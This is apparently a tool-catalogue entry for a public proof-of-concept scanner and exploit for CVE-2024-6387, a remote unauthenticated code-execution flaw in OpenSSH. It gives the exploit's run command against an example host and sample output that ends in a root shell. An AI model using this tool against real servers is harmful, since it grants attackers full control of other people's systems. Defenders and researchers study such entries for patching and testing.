← All tools

CVE-2024-6387

https://github.com/l0n3m4n/CVE-2024-6387

Free

Categories

Exploitation

Description

PoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (Scanner and Exploit)

Keywords

cve cve-2024-6387 exploit openssh-server payload poc python3 rce c

Screenshots

Example Usage

$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --port 22

 ██████╗ ██████╗ ███████╗███╗   ██╗███████╗███████╗██╗  ██╗
██╔═══██╗██╔══██╗██╔════╝████╗  ██║██╔════╝██╔════╝██║  ██║
██║   ██║██████╔╝█████╗  ██╔██╗ ██║███████╗███████╗███████║
██║   ██║██╔═══╝ ██╔══╝  ██║╚██╗██║╚════██║╚════██║██╔══██║
╚██████╔╝██║     ███████╗██║ ╚████║███████║███████║██║  ██║
 ╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═══╝╚══════╝╚══════╝╚═╝  ╚═╝
   Author: l0n3m4n / Scanner: @xaitax / PoC: @7etsuo 
    
Exploiting vulnerabilities...
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Received KEX_INIT (1024 bytes)
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
.....
Exploitation successful..!

~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)